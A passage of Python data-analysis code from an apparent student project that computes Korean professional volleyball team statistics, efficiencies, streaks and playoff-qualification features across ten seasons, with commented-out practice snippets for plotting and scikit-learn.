print("남자부 3위 최대 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(max(Mavg[0]),max(Mavg[1]),max(Mavg[2]),max(Mavg[3]),max(Mavg[4])))
print("남자부 3위 평균 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(avg(Mavg[0]),avg(Mavg[1]),avg(Mavg[2]),avg(Mavg[3]),avg(Mavg[4])))
print("남자부 3위 최소 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(min(Mavg[0]),min(Mavg[1]),min(Mavg[2]),min(Mavg[3]),min(Mavg[4])))
print('\n')
print("여자부 3위 최대 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(max(Favg[0]),max(Favg[1]),max(Favg[2]),max(Favg[3]),max(Favg[4])))
print("여자부 3위 평균 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(avg(Favg[0]),avg(Favg[1]),avg(Favg[2]),avg(Favg[3]),avg(Favg[4])))
print("여자부 3위 최소 승점 : %2.2f / 승 : %2.2f / 패 : %2.2f / 세트득실률 : %2.2f / 점수득실률 : %2.2f"%(min(Favg[0]),min(Favg[1]),min(Favg[2]),min(Favg[3]),min(Favg[4])))
"""
# ================================ Decision tree practice =========================================
"""
# http://yamalab.tistory.com/31 <reference>
from sklearn import tree
from sklearn import datasets
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
iris = datasets.load_iris()
X = iris.data[:,[2,3]]
Y = iris.target
#print(X)
#print(Y)
# 자동으로 데이터셋을 분리해주는 함수
X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.3,random_state=0)
# 데이터 표준화 작업
sc = StandardScaler()
sc.fit(X_train)
# 표준화된 데이터셋
X_train_std = sc.transform(X_train)
X_test_std = sc.transform(X_test)
iris_tree = tree.DecisionTreeClassifier(criterion='entropy',max_depth=3,random_state=0)
iris_tree.fit(X_train,Y_train)
# 정확도를 알기 위한 임포트
from sklearn.metrics import accuracy_score
Y_pred_tr = iris_tree.predict(X_test)
print("Accuracy : %.2f"%accuracy_score(Y_test,Y_pred_tr))
#from sklearn.tree import export_graphviz
#import pydotplus
#from IPython.display import Image
#
##from sklearn.tree import export_graphviz
##import pydotplus
##from IPython.display import Image
#
#dot_data = export_graphviz(iris_tree, out_file=None, feature_names=['petal length','petal width'],
# class_names=iris.target_names, filled=True, rounded=True, special_character=True)
#graph = pydotplus.graph_from_dot_data(dot_data)
#Image(graph.create_png())
"""
#===================== Compare per-category success rates to see whether they relate to winning a match (detailed match data) ===============================
"""
#===================== 오늘 또 하나의 좋은 삽질을 했다 ㅎㅎㅎㅎㅎ==================================================================================
# 경기에서 각 항목별 성공비율이 경기의 승리와 연관이 있는지 알아보자.
Hframe=kovo.Hframe
Aframe=kovo.Aframe
HScore=Hframe["득점"].sum()
AScore=Aframe["득점"].sum()
HA=Hframe["공격종합"]["성공"].sum()/Hframe["공격종합"]["시도"].sum()
AA=Aframe["공격종합"]["성공"].sum()/Aframe["공격종합"]["시도"].sum()
HO=Hframe["오픈"]["성공"].sum()/Hframe["오픈"]["시도"].sum()
AO=Aframe["오픈"]["성공"].sum()/Aframe["오픈"]["시도"].sum()
HT=Hframe["시간차"]["성공"].sum()/Hframe["시간차"]["시도"].sum()
AT=Aframe["시간차"]["성공"].sum()/Aframe["시간차"]["시도"].sum()
HRear=Hframe["후위"]["성공"].sum()/Hframe["후위"]["시도"].sum()
ARear=Aframe["후위"]["성공"].sum()/Aframe["후위"]["시도"].sum()
HQ=Hframe["속공"]["성공"].sum()/Hframe["속공"]["시도"].sum()
AQ=Aframe["속공"]["성공"].sum()/Aframe["속공"]["시도"].sum()
HQO=Hframe["퀵오픈"]["성공"].sum()/Hframe["퀵오픈"]["시도"].sum()
AQO=Aframe["퀵오픈"]["성공"].sum()/Aframe["퀵오픈"]["시도"].sum()
HServe=Hframe["서브"]["성공"].sum()/Hframe["서브"]["시도"].sum()
AServe=Aframe["서브"]["성공"].sum()/Aframe["서브"]["시도"].sum()
HD=Hframe["디그"]["성공"].sum()/Hframe["디그"]["시도"].sum()
AD=Aframe["디그"]["성공"].sum()/Aframe["디그"]["시도"].sum()
HSet=Hframe["세트"]["성공"].sum()/Hframe["세트"]["시도"].sum()
ASet=Aframe["세트"]["성공"].sum()/Aframe["세트"]["시도"].sum()
HReceive=Hframe["리시브"]["정확"].sum()/Hframe["리시브"]["시도"].sum()
AReceive=Aframe["리시브"]["정확"].sum()/Aframe["리시브"]["시도"].sum()
HBlock=Hframe["블로킹"]["성공"].sum()/Hframe["블로킹"]["시도"].sum()
ABlock=Aframe["블로킹"]["성공"].sum()/Aframe["블로킹"]["시도"].sum()
HE=Hframe["범실"].sum()
AE=Aframe["범실"].sum()
#print("현대캐파탈의 각 항목별 성공률\n 득점 : %2.2f / 공격종합 : %2.2f / 오픈 : %2.2f / 시간차 :%2.2f /\n 후위 : %2.2f / 속공 : %2.2f / 퀵오픈 : %2.2f / 서브 : %2.2f /\n 디그 : %2.2f / 세트 : %2.2f / 리시브 : %2.2f / 블로킹 : %2.2f / 범실 %d"%(HScore,HA,HO,HT,HRear,HQ,HQO,HServe,HD,HSet,HReceive,HBlock,HE))
#print("대한항공의 각 항목별 성공률\n 득점 : %2.2f / 공격종합 : %2.2f / 오픈 : %2.2f / 시간차 :%2.2f /\n 후위 : %2.2f / 속공 : %2.2f / 퀵오픈 : %2.2f / 서브 : %2.2f /\n 디그 : %2.2f / 세트 : %2.2f / 리시브 : %2.2f / 블로킹 : %2.2f / 범실 %d"%(AScore,AA,AO,AT,ARear,AQ,AQO,AServe,AD,ASet,AReceive,ABlock,AE))
# 경기 관련 정보 그래프 그리기
# https://matplotlib.org/examples/pylab_examples/barchart_demo.html 참조
# 내가 표현하고 싶은 데이터
Sky=[HA,HO,HT,HRear,HQ,HQO,HServe,HD,HSet,HReceive,HBlock]
Jumbos=[AA,AO,AT,ARear,AQ,AQO,AServe,AD,ASet,AReceive,ABlock]
fig,ax = plt.subplots() # 그래프를 여러개 표현할때 사용하는것 같다.
height = np.arange(len(Sky)) # y축 높이
bar_width=0.35 # 그래프의 너비
opacity = 0.4
# x축에 들어갈 이름
xlabel = ["공격종합","오픈","시간차","후위공격","속공","퀵오픈","서브","디그","세트","리시브","블로킹"]
# 데이터 bar형태로 표현
Sky_graph=plt.bar(height,Sky,bar_width,
alpha=opacity, # 그래프 불투명도
color='r', # 그래프 색깔
label='현대캐피탈')
# 여기서 그래프를 분리해서 보고 싶다면 y축에 그래프의 너비만큼을 더해줘야 한다.
Jumbos_graph=plt.bar(height+bar_width,Jumbos,bar_width,
alpha=opacity, # 그래프 불투명도
color='b', # 그래프 색깔
label='대한항공')
# x,y축 그래프 이름 설정
plt.xlabel('각 항목')
plt.ylabel('성공률')
plt.title('두 팀의 항목별 성공률 비교')
# x축 항목 이름 지정
plt.xticks(height,xlabel)
plt.legend()
plt.tight_layout()
plt.show()
"""
#============================================== Live (play-by-play) broadcast data analysis ===============================================================
"""
# 실시간 중계데이터에서 부문별 성공률 정리한 데이터 가져오기
On_air_rate=kovo.Rate_record
On_air_success=kovo.Success_record
# 각 세트의 항목별 성공률 그래프화
for set_num in range(4):
# 각 팀의 세트 데이터 가져오기
Sky_1st = On_air_rate.iloc[set_num]
Jumbos_1st = On_air_rate.iloc[set_num+1]
fig,ax = plt.subplots()
height = np.arange(len(Sky_1st)) # 그래프의 y축 높이
bar_width = 0.4 # 그래프의 너비
opacity = 0.4 #그래프의 불투명도
Home_graph=plt.bar(height,Sky_1st,bar_width,
alpha=opacity,
color='#000000',
label="현대캐피탈"
)
Away_graph=plt.bar(height+bar_width,Jumbos_1st,bar_width,
alpha=opacity,
color='#0000FF',
label="대한항공"
)
# x,y축 그래프 이름 설정
plt.xlabel=('각 항목')
plt.ylabel=('성공률')
plt.title('%d세트 두 팀의 항목별 성공률 비교'%(set_num+1))
# x축 항목 이름 지정
plt.xticks(height,kovo.Scoring_sort)
plt.legend()
plt.tight_layout()
plt.show()
# 각 세트의 성공횟수 그래프 생성
for set_num in range(4):
# 각 팀의 세트 데이터 가져오기
Sky_1st = On_air_success.iloc[set_num]
Jumbos_1st = On_air_success.iloc[set_num+1]
fig,ax = plt.subplots()
height = np.arange(len(Sky_1st))
bar_width = 0.4
opacity = 0.4
# Home팀의 경기 그래프
Home_graph=plt.bar(height,Sky_1st,bar_width,
alpha=opacity,
color='r',
label="현대캐피탈"
)
# Away팀의 경기 그래프
Away_graph=plt.bar(height+bar_width,Jumbos_1st,bar_width,
alpha=opacity,
color='g',
label="대한항공"
)
# x,y축,그래프 이름 설정
plt.xlabel=('각 항목')
plt.ylabel=('성공횟수')
plt.title('%d세트 두 팀의 항목별 성공횟수 비교'%(set_num+1))
# x축 항목 이름 지정
plt.xticks(height,kovo.Scoring_sort)
plt.legend()
plt.tight_layout()
plt.show()
"""
#===================================== Practice data ========================================================
"""
fruit=pd.DataFrame({
'사과':np.random.randint(100,1000,size=10),
'배':np.random.randint(100,1000,size=10),
'참외':np.random.randint(100,1000,size=10),
'옥수수':np.random.randint(100,1000,size=10),
'고구마':np.random.randint(100,1000,size=10),
'수박':np.random.randint(100,1000,size=10),
'딸기':np.random.randint(100,1000,size=10),
'토마토':np.random.randint(100,1000,size=10),
},
columns=['딸기','토마토','수박','참외','사과','배','옥수수','고구마'],
index=['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct']
)
print(fruit)
fruit.index.name="Month"
# 열 데이터 추가
#fruit["sum"]=fruit.sum(axis=1)
print(len(fruit.columns))
print(len(fruit.index))
# 행 데이터 추가
fruit.loc["Nov"]=np.random.randint(100,1000,size=8)
fruit.loc["Dec"]=np.random.randint(100,1000,size=8)
print(fruit)
# 엑셀파일로 내보내기
fruit.to_csv("fruit.csv",mode='w',encoding='EUC-KR')
"""
#store=pd.read_csv('fruit.csv',engine='python')
# Reset Month as the index
#store=store.set_index("Month")
#print(store)
#store.sum(axis=1).plot(kind="bar")
"""
# 엑셀파일을 읽어옵니다.
f=open('서울시 대중교통 수단별 이용 현황.csv','r',encoding='utf-8')
rdr=csv.reader(f)
# Data에 엑셀 내용 넣기
Data=[]
for line in rdr:
Data.append(line)
# Pandas로 Dataframe에 넣기
#Seoul=pd.DataFrame(Data[1:len(Data)+1],columns=Data[0],index=np.arange(1,len(Data)))
#Seoul=pd.DataFrame(Data[3:len(Data)+1],columns=Data[0][3:13],index=Data[:][2:])
#for loop in range(2,len(Data)):
# print(Data[loop][2:])
#print(Seoul.info())
#print(Seoul)
# iloc는 [행,열]을 적으면 해당 데이터를 긁어온다.
#move=Seoul.iloc[:,3:13].sum(axis=0)
move=[]
# 달 정보 넣기
month=Data[0][3:13]
# map(자료형,data)는 해당 자료를 입력 자료형 형태로 변환해주는 함수이다.
for index in range(1,len(Data)-1):
move.append(list(map(int,Data[index][3:13])))
# Dataframe에서 강제로 문자열을 숫자로 바꾸는 함수
def coerce_df_columns_to_numeric(df, column_list):
df[column_list] = df[column_list].apply(pd.to_numeric, errors='coerce')
coerce_df_columns_to_numeric(Seoul,['1월','2월','3월','4월','5월','6월','7월','8월','9월','10월','11월','12월'])
#월별 지하철 이용객 그래프로 표시
#Seoul.iloc[:,3:13].sum(axis=0).plot(kind="bar")
#Seoul["1월"].plot(kind="bar")
"""
```
#### File: Graduate_work/Analysis/Analysis_selenium.py
```python
import pandas as pd
import numpy as np
import matplotlib as mpl
import matplotlib.pylab as plt
from collections import Counter
from sklearn import preprocessing
# Import needed so that Korean fonts are not broken in the plots
import matplotlib.font_manager as fm
# Specify the font file to load
font_location='E:/글꼴/H2GTRE.TTF'
# Specify the font name
font_name=fm.FontProperties(fname=font_location).get_name()
mpl.rc('font',family=font_name)
# Number of seasons to count
count = 10
# Starting year
syear = 8
def data_norm(table):
col = table.columns
# 데이터 정규화 과정
x = table[col].values
min_max_scaler = preprocessing.MinMaxScaler()
x_scaled = min_max_scaler.fit_transform(x.astype(float))
table = pd.DataFrame(x_scaled,
columns=col,
index=table.index)
return table
def convert_negative(table,name):
for loop in range(0,len(table.columns)):
if len(table.columns[loop])==2:
if(table.columns[loop][-1]==name):
table[table.columns[loop]] = table[table.columns[loop]]*-1
# ===================================================================== Multi-season (ten seasons) result data ===================================================================
# Lists to hold the playoff-qualification factors
M_factor_list = [[] for i in range(count)]
F_factor_list = [[] for i in range(count)]
Mcount = []
Fcount = []
Mdata = []
Fdata = []
# Load and store the season result tables.
for year in range(syear,18):
kovo_Mresult_table = pd.read_pickle('Kovo_Male_result_table(%s-%s)'%(str(year),str(year+1)))
kovo_Fresult_table = pd.read_pickle('Kovo_Female_result_table(%s-%s)'%(str(year),str(year+1)))
# 플레이오프와 관련없는 순위/팀/경기수/세트수에 대한 데이터 제거
for i in range(7,72):
if i ==7:
if kovo_Mresult_table.columns[i][1]=='순위':
for index in range(i,i+3):
del kovo_Mresult_table[kovo_Mresult_table.columns[i]]
del kovo_Fresult_table[kovo_Fresult_table.columns[i]]
else:
if kovo_Mresult_table.columns[i][1]=='순위':
for index in range(i,i+4):
del kovo_Mresult_table[kovo_Mresult_table.columns[i]]
del kovo_Fresult_table[kovo_Fresult_table.columns[i]]
# Load the season win/loss results into Season_*_data
Season_male_data = pd.read_pickle('Male_Season(%s-%s)'%(str(year),str(year+1)))
Season_female_data = pd.read_pickle('Female_Season(%s-%s)'%(str(year),str(year+1)))
# Store the season standings (team names) of the men's and women's divisions in Team_name
Male_team_name = kovo_Mresult_table.index
Female_team_name = kovo_Fresult_table.index
# Create arrays to hold the longest winning/losing streak of each men's and women's team
Male_win_score = np.zeros(len(Male_team_name))
Male_lose_score = np.zeros(len(Male_team_name))
Female_win_score = np.zeros(len(Female_team_name))
Female_lose_score = np.zeros(len(Female_team_name))
win = 0
lose = 0
# Compute each men's team's longest winning and losing streak and store it in the arrays
for team in range(len(Male_team_name)):
for index in range(len(Season_male_data)):
if Season_male_data["홈"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "승" or Season_male_data["상대팀"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "패":
win += 1
lose = 0
if Male_win_score[team] < win:
Male_win_score[team] = win
elif Season_male_data["홈"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "패" or Season_male_data["상대팀"][index] == Male_team_name[team] and Season_male_data["승패"][index] == "승":
lose+=1
win = 0
if Male_lose_score[team] < lose:
Male_lose_score[team] = lose
# Compute and store each women's team's longest winning and losing streak
for team in range(len(Female_team_name)):
for index in range(len(Season_female_data)):
if Season_female_data["홈"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "승" or Season_female_data["상대팀"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "패":
win += 1
lose = 0
if Female_win_score[team] < win:
Female_win_score[team] = win
elif Season_female_data["홈"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "패" or Season_female_data["상대팀"][index] == Female_team_name[team] and Season_female_data["승패"][index] == "승":
lose+=1
win = 0
if Female_lose_score[team] < lose:
Female_lose_score[team] = lose
Male_attack_efficiency = ((kovo_Mresult_table[('공격', '성공')]-kovo_Mresult_table[('공격', '공격차단')]-kovo_Mresult_table[('공격', '범실')])/kovo_Mresult_table[('공격', '시도')])*100
Female_attack_efficiency = ((kovo_Fresult_table[('공격', '성공')]-kovo_Fresult_table[('공격', '공격차단')]-kovo_Fresult_table[('공격', '범실')])/kovo_Fresult_table[('공격', '시도')])*100
Male_open_attack_efficiency = ((kovo_Mresult_table[('오픈공격', '성공')]-kovo_Mresult_table[('오픈공격', '공격차단')]-kovo_Mresult_table[('오픈공격', '범실')])/kovo_Mresult_table[('오픈공격', '시도')])*100
Female_open_attack_efficiency = ((kovo_Fresult_table[('오픈공격', '성공')]-kovo_Fresult_table[('오픈공격', '공격차단')]-kovo_Fresult_table[('오픈공격', '범실')])/kovo_Fresult_table[('오픈공격', '시도')])*100
Male_time_attack_efficiency = ((kovo_Mresult_table[('시간차공격', '성공')]-kovo_Mresult_table[('시간차공격', '공격차단')]-kovo_Mresult_table[('시간차공격', '범실')])/kovo_Mresult_table[('시간차공격', '시도')])*100
Female_time_attack_efficiency = ((kovo_Fresult_table[('시간차공격', '성공')]-kovo_Fresult_table[('시간차공격', '공격차단')]-kovo_Fresult_table[('시간차공격', '범실')])/kovo_Fresult_table[('시간차공격', '시도')])*100
Male_moving_attack_efficiency = ((kovo_Mresult_table[('이동공격', '성공')]-kovo_Mresult_table[('이동공격', '공격차단')]-kovo_Mresult_table[('이동공격', '범실')])/kovo_Mresult_table[('이동공격', '시도')])*100
Female_moving_attack_efficiency = ((kovo_Fresult_table[('이동공격', '성공')]-kovo_Fresult_table[('이동공격', '공격차단')]-kovo_Fresult_table[('이동공격', '범실')])/kovo_Fresult_table[('이동공격', '시도')])*100
Male_back_attack_efficiency = ((kovo_Mresult_table[('후위공격', '성공')]-kovo_Mresult_table[('후위공격', '공격차단')]-kovo_Mresult_table[('후위공격', '범실')])/kovo_Mresult_table[('후위공격', '시도')])*100
Female_back_attack_efficiency = ((kovo_Fresult_table[('후위공격', '성공')]-kovo_Fresult_table[('후위공격', '공격차단')]-kovo_Fresult_table[('후위공격', '범실')])/kovo_Fresult_table[('후위공격', '시도')])*100
Male_quick_attack_efficiency = ((kovo_Mresult_table[('속공', '성공')]-kovo_Mresult_table[('속공', '공격차단')]-kovo_Mresult_table[('속공', '범실')])/kovo_Mresult_table[('속공', '시도')])*100
Female_quick_attack_efficiency = ((kovo_Fresult_table[('속공', '성공')]-kovo_Fresult_table[('속공', '공격차단')]-kovo_Fresult_table[('속공', '범실')])/kovo_Fresult_table[('속공', '시도')])*100
Male_quick_open_efficiency = ((kovo_Mresult_table[('퀵오픈', '성공')]-kovo_Mresult_table[('퀵오픈', '공격차단')]-kovo_Mresult_table[('퀵오픈', '범실')])/kovo_Mresult_table[('퀵오픈', '시도')])*100
Female_quick_open_efficiency = ((kovo_Fresult_table[('퀵오픈', '성공')]-kovo_Fresult_table[('퀵오픈', '공격차단')]-kovo_Fresult_table[('퀵오픈', '범실')])/kovo_Fresult_table[('퀵오픈', '시도')])*100
Male_serve_efficiency = ((kovo_Mresult_table[('서브', '성공')]-kovo_Mresult_table[('서브', '범실')])/kovo_Mresult_table[('서브', '시도')])*100
Female_serve_efficiency = ((kovo_Fresult_table[('서브', '성공')]-kovo_Fresult_table[('서브', '범실')])/kovo_Fresult_table[('서브', '시도')])*100
Male_blocking_efficiency = ((kovo_Mresult_table[('블로킹', '성공')]+kovo_Mresult_table[('블로킹', '유효블락')]+kovo_Mresult_table[('블로킹', '어시스트')]-kovo_Mresult_table[('블로킹', '범실')]-kovo_Mresult_table[('블로킹', '실패')])/kovo_Mresult_table[('블로킹', '시도')])*100
Female_blocking_efficiency = ((kovo_Fresult_table[('블로킹', '성공')]+kovo_Fresult_table[('블로킹', '유효블락')]+kovo_Fresult_table[('블로킹', '어시스트')]-kovo_Fresult_table[('블로킹', '범실')]-kovo_Fresult_table[('블로킹', '실패')])/kovo_Fresult_table[('블로킹', '시도')])*100
Male_dig_efficiency = ((kovo_Mresult_table[('디그', '성공')]-kovo_Mresult_table[('디그', '실패')]-kovo_Mresult_table[('디그', '범실')])/kovo_Mresult_table[('디그', '시도')])*100
Female_dig_efficiency = ((kovo_Fresult_table[('디그', '성공')]-kovo_Fresult_table[('디그', '실패')]-kovo_Fresult_table[('디그', '범실')])/kovo_Fresult_table[('디그', '시도')])*100
Male_set_efficiency = ((kovo_Mresult_table[('세트', '성공')]-kovo_Mresult_table[('세트', '범실')])/kovo_Mresult_table[('세트', '시도')])*100
Female_set_efficiency = ((kovo_Fresult_table[('세트', '성공')]-kovo_Fresult_table[('세트', '범실')])/kovo_Fresult_table[('세트', '시도')])*100
Male_receive_efficiency = ((kovo_Mresult_table[('리시브', '정확')]-kovo_Mresult_table[('리시브', '범실')])/kovo_Mresult_table[('리시브', '시도')])*100
Female_receive_efficiency = ((kovo_Fresult_table[('리시브', '정확')]-kovo_Fresult_table[('리시브', '범실')])/kovo_Fresult_table[('리시브', '시도')])*100
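# A worked example of the efficiency formula used above (not from the source):
# efficiency = (successes - blocked - errors) / attempts * 100, so 1000 attack
# attempts with 520 kills, 80 blocked and 60 errors give (520-80-60)/1000*100 = 38.0,
# while the plain success rate would be 52.0. Serve, set and receive efficiencies
# omit the "blocked" term, and the blocking efficiency also credits effective
# blocks and assists, exactly as coded above.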
import Analysis_practice as As
# Temporarily add a column indicating whether each team reached the playoffs.
Male_play_off = []
Female_play_off = []
# 1 means the team advanced to the playoffs / 0 means it did not
for index in range(len(kovo_Mresult_table)) :
if index<3:
Male_play_off.append(1)
else:
# From the 2011 season onward the 4th-place men's team also advances when it is within 3 points of 3rd place, so that condition has to be added.
if year>10 and index==3 and kovo_Mresult_table.iloc[2]["승점"]-kovo_Mresult_table.iloc[3]["승점"]<=3:
Male_play_off.append(1)
else:
Male_play_off.append(0)
for index in range(len(kovo_Fresult_table)) :
if index<3:
Female_play_off.append(1)
else:
Female_play_off.append(0)
# The attack-efficiency columns are inserted right next to the attack columns so the table stays easy to read.
kovo_Mresult_table.insert(loc=16,column="공격_효율",value=Male_attack_efficiency)
kovo_Fresult_table.insert(loc=16,column="공격_효율",value=Female_attack_efficiency)
kovo_Mresult_table.insert(loc=22,column="오픈공격_효율",value=Male_open_attack_efficiency)
kovo_Fresult_table.insert(loc=22,column="오픈공격_효율",value=Female_open_attack_efficiency)
kovo_Mresult_table.insert(loc=28,column="시간차공격_효율",value=Male_time_attack_efficiency)
kovo_Fresult_table.insert(loc=28,column="시간차공격_효율",value=Female_time_attack_efficiency)
# Not added because it contains too many NaN values.
# kovo_Mresult_table.insert(loc=34,column="이동공격_효율",value=Male_moving_attack_efficiency)
# kovo_Fresult_table.insert(loc=34,column="이동공격_효율",value=Female_moving_attack_efficiency)
kovo_Mresult_table.insert(loc=39,column="후위공격_효율",value=Male_back_attack_efficiency)
kovo_Fresult_table.insert(loc=39,column="후위공격_효율",value=Female_back_attack_efficiency)
kovo_Mresult_table.insert(loc=45,column="속공_효율",value=Male_quick_attack_efficiency)
kovo_Fresult_table.insert(loc=45,column="속공_효율",value=Female_quick_attack_efficiency)
kovo_Mresult_table.insert(loc=51,column="퀵오픈_효율",value=Male_quick_open_efficiency)
kovo_Fresult_table.insert(loc=51,column="퀵오픈_효율",value=Female_quick_open_efficiency)
kovo_Mresult_table.insert(loc=56,column="서브_효율",value=Male_serve_efficiency)
kovo_Fresult_table.insert(loc=56,column="서브_효율",value=Female_serve_efficiency)
kovo_Mresult_table.insert(loc=64,column="블로킹_효율",value=Male_blocking_efficiency)
kovo_Fresult_table.insert(loc=64,column="블로킹_효율",value=Female_blocking_efficiency)
kovo_Mresult_table.insert(loc=70,column="디그_효율",value=Male_dig_efficiency)
kovo_Fresult_table.insert(loc=70,column="디그_효율",value=Female_dig_efficiency)
kovo_Mresult_table.insert(loc=75,column="세트_효율",value=Male_set_efficiency)
kovo_Fresult_table.insert(loc=75,column="세트_효율",value=Female_set_efficiency)
kovo_Mresult_table.insert(loc=80,column="리시브_효율",value=Male_receive_efficiency)
kovo_Fresult_table.insert(loc=80,column="리시브_효율",value=Female_receive_efficiency)
kovo_Mresult_table["최다연승"] = Male_win_score
kovo_Mresult_table["최다연패"] = Male_lose_score
kovo_Fresult_table["최다연승"] = Female_win_score
kovo_Fresult_table["최다연패"] = Female_lose_score
kovo_Mresult_table["플레이오프진출"] = Male_play_off
kovo_Fresult_table["플레이오프진출"] = Female_play_off
if year<=10:
del kovo_Mresult_table["승률"]
del kovo_Fresult_table["승률"]
else:
del kovo_Mresult_table["승점"]
del kovo_Fresult_table["승점"]
# Flip the sign of the columns where a lower value is better (blocked attacks, errors, failures, longest losing streak).
convert_negative(kovo_Mresult_table,'공격차단')
convert_negative(kovo_Fresult_table,'공격차단')
convert_negative(kovo_Mresult_table,'범실')
convert_negative(kovo_Fresult_table,'범실')
convert_negative(kovo_Mresult_table,'실패')
convert_negative(kovo_Fresult_table,'실패')
convert_negative(kovo_Mresult_table,'최다연패')
convert_negative(kovo_Fresult_table,'최다연패')
Mdata.append(kovo_Mresult_table)
Fdata.append(kovo_Fresult_table)
# Concatenate everything into Male_data and Female_data.
Male_data = pd.concat([Mdata[0],Mdata[1],Mdata[2],Mdata[3],Mdata[4],Mdata[5],Mdata[6],Mdata[7],Mdata[8],Mdata[9]])
Female_data = pd.concat([Fdata[0],Fdata[1],Fdata[2],Fdata[3],Fdata[4],Fdata[5],Fdata[6],Fdata[7],Fdata[8],Fdata[9]])
# Ten seasons of data combined (with attack efficiency, longest streaks and playoff columns added)
Male_data.to_pickle("Total_M_Data")
Female_data.to_pickle("Total_F_Data")
# Remove features that are unrelated to playoff qualification
def delete_feature(table,name):
del table[name]
delete_feature(Male_data,'경기수')
delete_feature(Female_data,'경기수')
delete_feature(Male_data,'순위')
delete_feature(Female_data,'순위')
delete_feature(Male_data,'승')
delete_feature(Female_data,'승')
delete_feature(Male_data,'패')
delete_feature(Female_data,'패')
delete_feature(Male_data,'세트득실률')
delete_feature(Female_data,'세트득실률')
delete_feature(Male_data,'점수득실률')
delete_feature(Female_data,'점수득실률')
def change_name(table):
for loop in range(0,len(table.columns)):
# Tuple column names have length 2
if len(table.columns[loop])==2:
# For score/penalty/error the two tuple levels are identical, so keep only one of them.
if (table.columns[loop][-1]=='득점' and table.columns[loop][-2]=='득점') or (table.columns[loop][-1]=='벌칙' and table.columns[loop][-2]=='벌칙') or (table.columns[loop][-1]=='범실' and table.columns[loop][-2]=='범실'):
table.rename(columns={table.columns[loop]:table.columns[loop][-2]},inplace='True')
else:
table.rename(columns={table.columns[loop]:table.columns[loop][-2]+'_'+table.columns[loop][-1]},inplace='True')
change_name(Male_data)
change_name(Female_data)
delete_feature(Male_data,'벌칙')
delete_feature(Female_data,'벌칙')
# Temporarily export to Excel files
#Male_data.to_excel('male.xlsx')
#Female_data.to_excel('female.xlsx')
Mplayoff = Male_data['플레이오프진출']
del Male_data['플레이오프진출']
Fplayoff = Female_data['플레이오프진출']
del Female_data['플레이오프진출']
# Normalize the whole dataset (after all seasons have been collected).
Male_data_norm = data_norm(Male_data)
Female_data_norm = data_norm(Female_data)
# Extract the key factors
# All match factors
#Extract_M_Data = Male_data_norm[['득점_공격', '득점_블로킹', '득점_서브', '득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','공격_효율','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률','오픈공격_효율','시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','시간차공격_효율','이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실', '이동공격_성공률',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률','후위공격_효율', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률','속공_효율', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률','퀵오픈_효율', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균','서브_효율', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균','블로킹_효율',
# '디그_시도', '디그_성공', '디그_실패', '디그_범실', '디그_세트당평균','디그_효율', '세트_시도', '세트_성공',
# '세트_범실', '세트_세트당평균','세트_효율', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균','리시브_효율', '범실']]
#Extract_F_Data = Female_data_norm[['득점_공격', '득점_블로킹', '득점_서브', '득점', '공격_시도', '공격_성공', '공격_공격차단', '공격_범실',
# '공격_성공률','공격_효율','오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실',
# '오픈공격_성공률','오픈공격_효율','시간차공격_시도', '시간차공격_성공', '시간차공격_공격차단', '시간차공격_범실',
# '시간차공격_성공률','시간차공격_효율','이동공격_시도', '이동공격_성공', '이동공격_공격차단', '이동공격_범실', '이동공격_성공률',
# '후위공격_시도', '후위공격_성공', '후위공격_공격차단', '후위공격_범실', '후위공격_성공률','후위공격_효율', '속공_시도',
# '속공_성공', '속공_공격차단', '속공_범실', '속공_성공률','속공_효율', '퀵오픈_시도', '퀵오픈_성공', '퀵오픈_공격차단',
# '퀵오픈_범실', '퀵오픈_성공률','퀵오픈_효율', '서브_시도', '서브_성공', '서브_범실', '서브_세트당평균','서브_효율', '블로킹_시도',
# '블로킹_성공', '블로킹_유효블락', '블로킹_실패', '블로킹_범실', '블로킹_어시스트', '블로킹_세트당평균','블로킹_효율',
# '디그_시도', '디그_성공', '디그_실패', '디그_범실', '디그_세트당평균','디그_효율', '세트_시도', '세트_성공',
# '세트_범실', '세트_세트당평균','세트_효율', '리시브_시도', '리시브_정확', '리시브_범실', '리시브_세트당평균','리시브_효율', '범실']]
# 공격파트
#Extract_M_Data = Male_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률','공격_효율']]
#Extract_F_Data = Female_data_norm[['공격_시도', '공격_성공', '공격_공격차단', '공격_범실','공격_성공률','공격_효율']]
# 오픈공격파트
#Extract_M_Data = Male_data_norm[['오픈공격_시도', '오픈공격_성공', '오픈공격_공격차단', '오픈공격_범실','오픈공격_성공률', '오픈공격_효율']]
